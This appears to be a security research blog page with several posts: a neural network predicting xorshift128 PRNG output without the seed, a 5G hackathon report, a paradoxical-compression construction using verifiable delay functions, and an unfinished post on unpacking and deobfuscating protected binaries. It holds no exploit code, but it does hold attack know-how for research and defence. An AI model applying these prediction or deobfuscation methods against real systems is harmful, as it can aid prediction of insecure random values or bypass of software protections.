🔒
There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

15 October 2021 at 17:29

Outline

1. Introduction

This blog post proposes an approach to crack Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking here, we mean that we can predict the sequence of the random numbers using previously generated numbers without the knowledge of the seed. We started by breaking a simple PRNG, namely XORShift, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post. Also, we have achieved a higher accuracy. This blog aims to show how to train a machine learning model that can reach 100% accuracy in generating random numbers without knowing the seed. And we also deep dive into the trained model to show how it worked and extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy without having the PRNG seed using a deep learning model. After training, the model can use any consecutive four generated numbers to replicate the same sequence of the PRNG with bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2]

At first glance, this seemed a bit counter-intuitive as the whole idea behind machine learning algorithms is to learn from the patterns in the data to perform a specific task, ranging from supervised, unsupervised to reinforcement learning. On the other hand, the pseudo-random number generators’ main idea is to generate random sequences and, hence, these sequences should not follow any pattern. So, it did not make any sense (at the beginning) to train an ML model, which learns from the data patterns, from PRNG that should not follow any pattern. Not only learn, but also get a 95% bitwise accuracy, which means that the model will generate the PRNG’s exact output and only gets, on average, two bits wrong. So, how is this possible? And why can machine learning crack the PRNG? Can we even get better than the 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let’s start first by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) could crack the xorshift128 PRNG, we need to comprehend how it works and check whether it is following any patterns or not. Let’s start by digging into its implementation of the xorshift128 PRNG algorithm to learn how it works. The code implementation of this algorithm can be found on Wikipedia and shared in [2]. Here is the function that was used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing the seed and the state of the PRNG simultaneously. Of course, we can update this generator implementation to provide the seed with a different function call instead of hardcoding it. Every time we call the generator, it will shift the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w. The new w is then returned as the new random number output of the random number generator. Let’s call the function output, o

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following output bits representations of the output, o:

O0 = W0 ^ W19 ^ X0 ^ X8

O1 = W1 ^ W20 ^ X1 ^ X9

.

.

O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four generated numbers from this PRNG, we can use the algorithm to generate the whole sequence; this could be the main reason why this algorithm is not cryptographically secure. Although the algorithm-generated numbers seem to be random with no clear relations between them, an attacker with the knowledge of the algorithm can predict the whole sequence of xorshift128 using any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know that there is some relation between the newly generated number and its last four ones without knowing the implementation of the algorithm.

Returning to the main question slightly: Can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation using only the last four inputs?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptron (MLP), is one of the most commonly used machine learning algorithms. It consists of small computing units, called neurons or perceptrons, organized into sets of unconnected neurons, called layers. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of 2 layers NN (the input layer is not counted). The details of the mathematical formulation of the NN are out of the scope of this article.

While the NN is being trained from the input data, the connections between the neurons, aka the weights, either get stronger (high positive or low negative values) to represent a high positively/negatively strong connection between two neurons or get weaker (close to 0) to represent that there is no connection at all. At the end of the training, these connections/weights encode the knowledge stored in the NN model. 

One example used to describe how NNs handle nonlinear data is NN’s use to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that although it is simple, its outputs are not linearly separable [3]. Hence, using an NN with two layers is the best way to represent the two input XOR gate. The following figure (from Abhranil blog [3]) shows how we can use a two-layer neural network to imitate a two-input XOR. The numbers on the lines are the weights, and the number inside the nodes are the thresholds (negative bias) and assuming using a step activation function. 

In case we have more than two inputs for XOR, we will need to increase the number of the nodes in the hidden layer (the layer in the middle) to make it possible to represents the other components of the XOR. 

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer as that is all we need to represent any set of XOR functions as implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like LSTM (“Long short-term memory,” a type of recurrent neural network), especially that all output bits are directly connected to sets of the input bits with XOR functions, as we have shown earlier, and there is no need for preserving internal states, as it is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model would have 128 inputs in the input layer to represent the last four generated integer numbers, 32-bit each, and 32 outputs in the output layer to express the next 32-bit random generated number. The main hyperparameter that we need to decide is the number of neurons/nodes in the hidden layer. We don’t want a few nodes that can not represent all the XOR functions terms, and at the same time, we don’t want to use a vast number of nodes that would not be used and would complex the model and increase the training time. In this case, and based on the number of inputs, outputs, and the XOR functions complexity, we made an educated guess and used 1024 hidden nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of the parameters of the output layer is 32,800 (1024×32 weights + 32 biases), which gets to a total of 164,896 parameters to train. Comparing to the model used in [1]:

_________________________________________________________________
Layer (type) Output Shape Param # ================================================================= lstm (LSTM) (None, 1024) 4329472 _________________________________________________________________ dense (Dense) (None, 512) 524800 _________________________________________________________________ dense_1 (Dense) (None, 512) 262656 _________________________________________________________________ dense_2 (Dense) (None, 512) 262656 _________________________________________________________________ dense_3 (Dense) (None, 512) 262656 _________________________________________________________________ dense_4 (Dense) (None, 512) 262656 _________________________________________________________________ dense_5 (Dense) (None, 32) 16416 ================================================================= Total params: 5,921,312 Trainable params: 5,921,312 Non-trainable params: 0 _________________________________________________________________

This complex model has around 6 million parameters to train, which will make the model training harder and take a much longer time to get good results. It could also easily be stuck in one of the local minima in that huge 6 million dimension space. Additionally, storing this model and serving it later will use 36 times the space needed to store/serve our model. Furthermore, the number of the model parameters affects the amount of required data to train the model; the more parameters, the more input data is needed to train it.

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function to be used in this case is “binary_crossentropy,” not “mse.” Without getting into the math of both of these loss functions, it is sufficient to say that we don’t care if the output is 0.8, 0.9, or even 100. All we care about is that the value crosses some threshold to be considered one or not to be considered zero. Another non-optimal choice of the parameter in that model is the activation function of the output layer.  As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for these types of nodes is usually a sigmoid function. On the contrary, that model uses a linear activation function to output any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but the training of that model will be more challenging and take more time. 

For the rest of the hyperparameters, we have used the same as in the model in [1]. Also, we used the same input sample as the other model, which consists of around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. Training and testing random number samples are formed into a quadrable of consequent random numbers to be used as inputs to the model, and the next random number is used as an output to the model. It is worth mentioning that we don’t think we need that amount of data to reach the performance we reached; we just tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarises the model parameters/ hyperparameters for our model in comparison with the model proposed in [1]:

NN Model in [1] Our Model
Model Type LSTM and Dense Network Dense Network
#Layers 7 2
#Neurons 1024 LSTM
2592 Dense 
1056 Dense
#Trainable Parameters 5,921,312
(4,329,472 only from the LSTM layer)
164,896
Activation Functions Hidden Layers: relu
Output Layer: linear
Hidden Layer: relu
Output Layer: sigmoid
Loss Function mse binary_crossentropy
Comparison between our proposed model and the model from the post in [1]

4.2 Model Results

After a few hours of model training and optimizing the hyperparameters, the NN model has achieved 100% bitwise training accuracy! Of course, we ran the test set through the model, and we got the same result with 100% bitwise accuracy. To be more confident about what we have achieved, we have generated a new sample of 100,000 random numbers with a different seed than those used to generate the previous data, and we got the same result of 100% bitwise accuracy. It is worth mentioning that although the referenced article achieved 95%+ bitwise accuracy, which looks like a promising result. However, when we evaluated the model accuracy (versus bitwise accuracy), which is its ability to generate the exact next random numbers without any bits flipped, we found that the model’s accuracy dropped to around 26%. Compared to our model, we have 100% accuracy.  The 95%+ bitwise is not failing only on 2 bits as it may appear (95% of 32 bit is less than 2), but rather these 5% errors are scattered throughout 14 bits. In other words, although the referenced model has bitwise accuracy of 95%+, 18 bits only would be 100% correct, and on average, 2 bits out of the rest of the 14 bits would be altered by the model.

The following table summarizes the two model comparisons:

NN Model in [1] Our Model
Bitwise Accuracy 95% + 100%
Accuracy 26% 100%
Bits could be Flipped (out of 32) 14 0
Models accuracy comparison

In machine learning, getting 100% accuracy is usually not good news. It normally means either we don’t have a good representation of the whole dataset, we are overfitting the model for the sample data, or the problem is deterministic that it does not need machine learning. In our case, it is close to the third choice. The xorshift128 PRNG algorithm is deterministic; we need to know which input bits are used to generate output bits, but the function to connect them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. So, for this problem, getting a 100% accurate model means that the ML model has learned the bits connection mappings between the input and output bits. So, if we get any consequent four random numbers generated from this algorithm, the model will generate the random numbers’ exact sequence as the algorithm does, without knowing the seed.

4.3 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the PRNG data and if it matches our expectations. 

4.3.1 Model First Layer Connections

As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation of xorshift128 PRNG only uses the first and last numbers of the four, called w and x, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs, the last four generated numbers merged, from the input layer to the hidden layer, the 1024 hidden nodes, of our trained model to see how strong they are connected and hence we can verify which bits are used to generate the outputs. The following figure shows the value of weights on the y-axes connecting each input, in x-axes, to the 1024 hidden nodes in the hidden layer. In other words, each dot on the graph represents the weight from any of the hidden nodes to the input in the x-axes:

As we can see, very few of the hidden nodes are connected to one of the inputs, where the weight is greater than ~2.5 or less than ~-2.5. The rest of the nodes with low weights between -2 and 2 can be considered not connected. We can also notice that inputs between bit 32 and 95 are not connected to any hidden layers. This is because what we stated earlier that the implementation of xorshift128 PRNG uses only x, bits from 0 to 31, and w, bits from 96 to 127, from the inputs, and the other two inputs, y, and z representing bits from 32 to 95, are not utilized to generate the output, and that is exactly what the model has learned. This implies that the model has learned that pattern accurately from the data given in the training phase.

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output, in x-axes, to the 1024 hidden nodes in the hidden layer:

Like our previous observation, each output bit is connected only to a very few nodes from the hidden layer, maybe except bit 11, which is less decisive and may need more training to be less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but we can do the rest the same way. If we focus only on bit 0 on the figure, we can see that it is connected only to five nodes from the hidden layers, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes, which we circled in the figure. They are bits 0, 8, 96, and 115, which if we modulo them by 32, we get bits 0 and 8 from the first number, x, and 0 and 19 from the fourth number, w. This matches the xorshift128 PRNG function we derived in section 2, the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8.  We expect the five hidden nodes with the one output node to resemble the functionality of an XOR  of these four input bits. Hence, the ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 11 bits to the right, which can be binary encoded as 010110, where the least significant bit, 0, represents the right direction. The variable x is shifted 19 bits to the right, which can be binary encoded as 100111, where the least significant bit, 1, represents the left direction. This representation will take 4 bits + 4×6 bits = 28 bits. For sure, we need to make sure that the 4 bits that select the variables do not have these values: 0000, 0001, 0010, 0100, and 1000, as they would select one or no variable to XOR. 

Using this simple update will add small complexity to PRNG algorithm implementation. It will still make the ML model learn only one possible sequence of about 16M different sequences generated with the same algorithm with different seeds. As if the ML would have only learned the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks, but the other properties of the outcome PRNG, such as periodicity, are yet to be studied.

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consequent numbers generated from this PRNG, it can generate the exact sequence without getting access to the seed. We also studied how we can design an NN model that would represent this PRNG the best. Here are some of the lessons learned from this article:

  1. Although xorshift128 PRNG may to humans appear to not follow any pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2.  Applying deep learning to predict PRNG output requires understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models would attain higher accuracy that simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post in [1] with the changes explained in this post. This was intentionally done to keep the same data and other parameters unchanged for a fair comparison.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The repo for code implementation  for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/

NCC Group placed first in global 5G Cyber Security Hack competition

14 October 2021 at 09:00

In June of this year, Traficom – the Finnish transport and communications agency – along with the Aalto University, Cisco, Ericsson, Nokia, and PwC, organized the 5G Cyber Security Hack competition. A similar event was organised in November 2019 in Oulu, Finland and this hackathon-style event was a follow-up to their successful 2019 event. Due to Covid restrictions, this year’s event was fully remote and as such made it easier for a larger pool of security experts to take part. Similar to 2019, there were four interesting hacking challenges relating to 5G technology and its use cases. The NCC Group team participated in the 2019 event and finished in second place in the Ericsson challenge, so we were eager to take on this year’s challenge.  A large number of participants took part in the event this year with around 130 security experts from around the world, and teams are invited to participate by application only.

This year, NCC Group consultants, Ross Bradley, Eva Esteban Molina, Phil Marsden and Mark Tedman took part in the Ericsson “Hack the Crown Jewels” challenge, for which they won first prize.

5G networks offer greater connectivity and faster wireless broadband and are now being rolled out over a large proportion of the world with it now being used extensively by 250+ million subscribers world-wide. With that comes the exponential increase in 5G speed and capacity, and there has been a decisive shift in technology development pushing new capability from home networks to critical national infrastructures all using 5G equipment. The security of 5G networks is now high on the agenda of many operators, vendors and governments and excellent events like the 5G Cyber Security hackathon highlight the continuing work ongoing to help secure these networks. 

This Hack challenge offered hackers four real-life use cases for 5G to work on – a Cisco CTF challenge on a staged 5G network, a 5G Ericsson Packet Core Gateway, Nokia’s edge data center system and PwC/Aalto University’s 5G testbed.

The Hack is admittedly fun, but it isn’t just for fun – these kinds of activities play a really crucial part in the iterative design and engineering process for network equipment manufacturers to ensure the security and safety of users. Each company putting forward a use case for hacking also offering up bug bounty prize money, which is shared among the best hacker(s) / team(s), as one mechanism for helping vendors to ideally find and remediate security risks in their systems before threat actors can exploit them.

The 5G Packet Core Gateway challenge

The details of the overall event, including the findings of individual challenges, are subject to non-disclosure agreements, but the exercise itself was a great demonstration of our Telecommunication Practice’s capability. The 5G Ericsson Packet Core Gateway is a key part of the mobile 5G core infrastructure and it is essential that all vendors understand how vulnerabilities and security risks within it could be exploited by an attacker. We dedicated our time to on the Ericsson challenge, which focussed on finding security weaknesses in the backbone of the mobile 5G core infrastructure – the Packet Core Gateway.

The hackathon started with an introduction on Friday evening, with challenges opening up to competitors at 8pm. Hacking continued all weekend till 11am on the Sunday morning. Our findings were shared throughout the competition with the Ericsson team, with final findings submitted before the 11am deadline on the Sunday morning. Prizes were award on the Sunday afternoon at which time it was revealed we had won the Ericsson challenge (plus come second in the team photo)! The event was well-run by the Ericsson team and the event organisers and we look forward to participating in any future events. 

About NCC Group’s Telecommunications Practice

This competition is just one of the many ways that NCC Group is actively improving the security of 5G infrastructure. In addition to our 5G security research (some of which is published on this blog), we regularly work closely with network equipment manufacturers and operators alike, including through paid consulting engagements. We conduct regular security reviews of 5G core and RAN equipment, with specialist researchers and consultants skilled in everything from reverse engineering and hardware reviews to detailed high level threat assessments.

Paradoxical Compression with Verifiable Delay Functions

13 October 2021 at 10:00

We present here a new construction which has no real immediate usefulness, but is a good illustration of a fundamental concept of cryptography, namely that there is a great difference between knowing that some mathematical object exists, and being able to build it in practice. Thus, this construction can be thought of as having some educational virtue, in the spirit of the mathematical recreations that have been a favourite pastime of mathematicians since at least the early 17th century.

We call paradoxical compression a lossless compression algorithm such that:

  • On any input x (a sequence of bits), it produces an output C(x) (another sequence of bits) such that the original x can be rebuilt from C(x) (the compression is lossless).
  • There is at least one input x0 such that C(x0) is strictly shorter than x0 (the algorithm really deserves to be called a compression algorithm).
  • The input size is never increased: for all x, C(x) is never strictly longer than x.

This is mathematically impossible. There is no compression algorithm that can achieve these three properties simultaneously. Despite this impossibility, we can achieve it in practice. A paper describing the algorithm, and a demo implementation, are available at:
https://github.com/pornin/paradox-compress

The paper is also available on eprint.

A Few Important Warnings

  • This is not “infinite compression”. We are not talking about a compression algorithm that could reduce the size of every possible input. That would be very useful indeed, but it is impossible, and, so to speak, a lot more impossible than paradoxical compression. We merely claim that the output is not larger than the input, not that it is always shorter.
  • Both paradoxical and infinite compression have been “achieved” by various people when working on files by moving some information into the file metadata (file name, date of creation or last modification…). We are not dealing here with such tricks; our inputs and outputs are generic sequences of bits, that do not have any metadata.

On the Impossibility of Paradoxical Compression

Let x0 be an input which is reduced by the compression algorithm. For instance, suppose that x0 has length 1000 bits, bit C(x0) has length 900 bits. For the compression algorithm to deserve that name, such an input must exist.

There are exactly 2901-1 possible bit sequences of up to 900 bits. Every one of them should be compressible into another bit sequence of up to 900 bits. Thus, all 2901-1 bit sequences are mapped to bit sequences in the same set. But the mapping must be injective: if two bit sequences are mapped to the same output, then that output cannot be reliably decompressed, since there would be two corresponding inputs. The hypothesis of losslessness forbids that situation. Therefore, all 2901-1 bit sequences of length up to 900 bits are mapped by the compression algorithm to 2901-1 distinct bit sequences of length up to 900 bits. This necessarily exhausts all of them, in particular C(x0). This implies that the compression of x0 produces an output which is also the result of compressing another input x1 distinct from x0 (since x1 has length at most 900 bits, while x0 has length 1000 bits). This is a contradiction: the compression algorithm cannot be lossless.

This simple demonstration is an application of what is now known as the pigeonhole principle, a well-known remark that can be expressed in set theory as follows: there cannot be an injective mapping from a finite set S1 to a finite set S2 if the cardinality of S2 is strictly lower than the cardinality of S1. In the early 17th century, the French Jesuit Jean Leucheron used it to explain that there necessarily are at least two men in the world with the same number of hair, since there are more men in the world than hairs on the head of any single man. The principle was restated several times along the centuries, with various metaphors, one of the most recent ones involving pigeons in a dovecote.

In the context of paradoxical compression, the pigeonhole principle basically means that there must exist a “problematic input” x that breaks one of the alleged properties: either C(x) is larger than x, or decompression of C(x) does not yield x back, or the compression or decompression algorithm fails to terminate.

Achieving Paradoxical Compression

Since we know that paradoxical compression is impossible, achieving it nonetheless is going to require some creativity. In other words, we will “cheat”. The conceptual trick here is the following: there exist some “problematic inputs”, but there are not necessarily many of them. Maybe we can arrange for them to be hard to find? In essence, we are moving the target: we won’t make an algorithm that can be proven to always work, but we might make one such that nobody can find a problematic input (even though everybody knows that these problematic inputs necessarily exist).

This is where the gist of the trick lies: there is an existence proof for problematic inputs, but this is not a constructive proof since it only demonstrates that such inputs must exist; it does not reveal them. In the world of mathematics, existence proofs are enough to conclude; but in the world of computers, which operate under finite resources, constructive proofs do not automatically follow. Most of cryptography strives in the gap between existence and constructive proofs. For instance, given a strong, cryptographically secure hash function such as SHA-256, we perfectly know that collisions must exist (the SHA-256 input space is vastly larger than the SHA-256 output space, so the SHA-256 function cannot be injective), but nobody ever managed to find one. We can even describe algorithms that will produce collisions if executed, but at a computational cost that far exceeds our available resources, so we cannot do that in practice.

In the case of paradoxical compression, the construction can be described as successive improvements. Let’s start with a “normal” compression algorithm such as DEFLATE (the core algorithm in the GZip and Zlib formats, also used in traditional Zip archives). This algorithm can reduce the size of some sequences of bits, in particular structured data commonly encountered in practical applications. However, for most possible inputs (e.g. output of a random generator), it will slightly increase the size. We want to fix that. A simple method is the following:

  • Compression: if DEFLATE(x) is shorter than x, then return DEFLATE(x). Otherwise, return x.
  • Decompression: if y can be inflated into x, then return x. Otherwise, return y.

This method assumes that a “compressed output” can be unambiguously distinguished from any other sequence of bits. This is, of course, not true, and it is easy to make this algorithm fail by applying the compressor on its own output: for a given x, C(x) is usually not itself compressible (after all, DEFLATE does a good job at removing the redundancies that DEFLATE itself leverages), so that C(C(x)) will return C(x) itself. Then, decompression of C(C(x)) will return x instead of C(x). C(x) is then a “problematic input” since it does not survive a compression-decompression cycle.

Now, we can handle that case by adjoining a counter in some sort of header. Compressed outputs will start with a counter of 0. If the input to the compression algorithm is already a compressed output, we’ll just increase the counter; the counter is really the number of nested invocations of the compression algorithm. This leads to the following:

  • Compression of x:
    • If DEFLATE(x) is shorter than x with some extra room for our counter (say, a 32-bit counter), then return DEFLATE(x) || 0.
    • Otherwise, if the input is itself x = DEFLATE(x’) || c for some input x’ and counter c, then return DEFLATE(x’) || c+1.
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 for some x, then return x.
    • Otherwise, if y = DEFLATE(x) || c from some input x and counter c > 0, then return DEFLATE(x) || c-1.
    • Otherwise, return y.

Does this work? Mostly. If you implement it and try it on some examples, including by trying to compress a compression output, then this seems to work. However, the problematic inputs are not unreachable. It can be shown that the above necessarily works except in a single place, which is the computation of c+1 in the second compression case: since the counter slot has a given fixed length, it may overflow. For instance, if the counter is a 32-bit integer, and c happens to be equal to 232-1, then c+1 does not fit. The compression algorithm would typically truncate the value to its low 32 bits, yielding 0, and decompression would not return the proper bit sequence. In other words, the “problematic inputs” are exactly the values DEFLATE(x) || 0xFFFFFFFF. You might take solace in the idea that it is unlikely that such an input occurs in practical, non-adversarial situations, but they are still easy enough to build. Thus, this is not good enough for us. We want a construction that cannot be broken even when actively trying to find a problematic input.

Note, though, that building a problematic input by compressing the output repeatedly is very inefficient; with a 32-bit counter, it takes more than 4 billions of recursive calls. Of course, if you want to make a problematic input on purpose, you don’t do that; you directly set the counter to the all-ones value. But what if you can’t?

Let’s now suppose that the compression and decompression algorithms are really compression and decompression systems that can be invoked, but which are opaque to attackers (this is called the “blackbox model”). In that case, we may imagine that the compressor somehow signs its outputs, so that attackers who want to make a problematic input cannot directly set the counter to the all-ones value; if the attacker must use the compression system to increase the counter, then reaching a counter overflow would require an inordinately large number of invocations. If the counter is large enough (e.g. 64 bits or more), then the compression system cannot do that in any practical time. This leads us to the following construction:

  • The compression and decompression system are assumed to share a secret key K. That key is used in a message authentication code (MAC). The MAC is supposed to be stateless, deterministic and unforgeable; in practice, consider it to be HMAC/SHA-256, possibly with an output truncated to 128 bits.
  • Compression of x:
    • If DEFLATE(x) is shorter than x by at least 64+128 = 192 bits, then return DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) (i.e. the concatenation of DEFLATE(x), the counter value 0 over 64 bits, and a 128-bit MAC computed over these two elements).
    • Otherwise, if the input is x = DEFLATE(x’) || c || MAC(DEFLATE(x’) || c) for some input x’ and counter c, then return DEFLATE(x’) || c+1 || MAC(DEFLATE(x’) || c+1).
    • Otherwise, return x.
  • Decompression of y:
    • If y = DEFLATE(x) || 0 || MAC(DEFLATE(x) || 0) for some input x, then return x.
    • Otherwise, if y = DEFLATE(x) || c || MAC(DEFLATE(x) || c) for some input x and counter c > 0, then return DEFLATE(x) || c-1 || MAC(DEFLATE(x) || c-1).
    • Otherwise, return y.

This construction achieves paradoxical construction because the problematic inputs (with counter c close to overflow) can be obtained only from the compression system itself (since we assume the MAC to be unforgeable), and the compression system produces new counter values only in minimal increments; getting a problematic input then requires too many (264 in this example) invocations of the compression system to be done in practice. If problematic inputs cannot be built, we win: nobody can make our compression/decompression system fail.

Removing the Shared Key Requirement

The construction above uses a MAC that relies on a shared secret value (the MAC key) between the compression and decompression systems. This is a restrictive model and we would like to remove this requirement. Can we build the same system, but in a keyless fashion?

We can, with a verifiable delay function (VDF). Such functions have been recently defined. In a nutshell, a VDF is a sort of hash function that takes a configurable time to compute (with no known shortcut) but also comes with a proof of correct computation, and the proof can be verified at a low computational cost. This is an extension of earlier time-lock puzzles. One can think of a VDF as a time-lock puzzle that can be verified to have been properly set.

In our paradoxical compression system described above, we used a MAC with a secret key in order to prevent outsiders from building problematic inputs. We can replace the MAC with a VDF, using the counter itself as work factor: an input with a very high counter value cannot be built in practice because that would mean a very high work factor: the secrecy of the key is replaced with a “computational wall” of the VDF becoming too expensive the compute for high counter values.

I implemented this method, using a VDF designed by Wesolowski. It is based on computing squarings modulo a big composite integer (i.e. an RSA modulus): raising an input x to the power 2c modulo n is postulated to require c successive squarings modulo n, with no known “shortcut” if the factorization of n is not known. Wesolowski’s VDF comes with a compact proof of correct construction, that can be efficiently verified. The implementation is in C# (mostly because C# has a DEFLATE implementation in its standard library, and I already had some C# implementation of the SHA3/SHAKE hash functions, and of big integers with primality tests). The 2048-bit modulus was generated as a random RSA key (I discarded the prime factors; now nobody knows them). The code can be obtained on GitHub.

The code is open-source and you may reuse it as you will (under the MIT license), but of course achieving paradoxical compression is not, in fact, a very useful property: it does not solve any real, practical problem. However, it is an enjoyable party trick.

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

